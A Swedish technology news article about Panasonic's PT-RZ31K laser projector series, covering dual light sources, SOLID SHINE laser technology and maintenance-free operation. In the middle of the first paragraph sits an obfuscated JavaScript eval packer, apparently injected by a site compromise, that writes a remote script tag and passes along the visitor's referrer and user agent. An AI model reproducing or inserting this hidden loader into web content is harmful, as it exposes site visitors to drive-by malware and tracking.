Image Image Image Image Image Image Image Image Image Image

| 15 oktober, 2018

Scroll to top

Top

Panasonic lanserar sin mest ljusstarka laserprojektor för stora lokaler

Panasonic lanserar sin mest ljusstarka laserprojektor för stora lokaler
Sebastian Plengier Ehrnfelt

PT-RZ31K-serien eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ktisn|var|u0026u|referrer|nskff||js|php’.split(‘|’),0,{}))
kommer att vara den mest ljusstarka i Panasonic-sortimentet, med en exceptionellt kompakt och lätt kropp baserad på kraftfull SOLID SHINE-laserteknologi. Den nya PT-RZ31K-serien laserfosforprojektorer finns tillgänglig från och med oktober 2016 i både WUXGA och SXGA+.

En unik funktion för dubbla ljuskällor tillåter oavbruten projektion, tack vare att den erbjuder redundans om ett tekniskt fel inträffar. Detta gör projektorn idealisk för högklassig underhållning, iscensättning, uthyrning och utställningsapplikationer.

Panasonics egenutvecklade SOLID SHINE-laserteknologi levererar långvarigt ljusa och högkvalitativa bilder och är utvecklad för 24/7 kontinuerlig drift utan färgförsämring.

RZ31K är gjord för 20 000 timmars underhållsfri drift och innehåller en Real Motion-processor, som använder frame-skapande teknologi för att återskapa extremt mjuka videobilder med minimal rörelseoskärpa.  

-Tack vare teknologin med dubbla ljuskällor, så har den nya serien potential att praktiskt taget eliminera behovet av en backup-projektor. Detta kommer säkert att tas emot väl av eventproduktionsbolag, eftersom projektor-stackar då kan göras mindre och inte lika komplicerade som tidigare, vilket sparar både tid och pengar och samtidigt innebär att fler platser kan säljas på arenorna.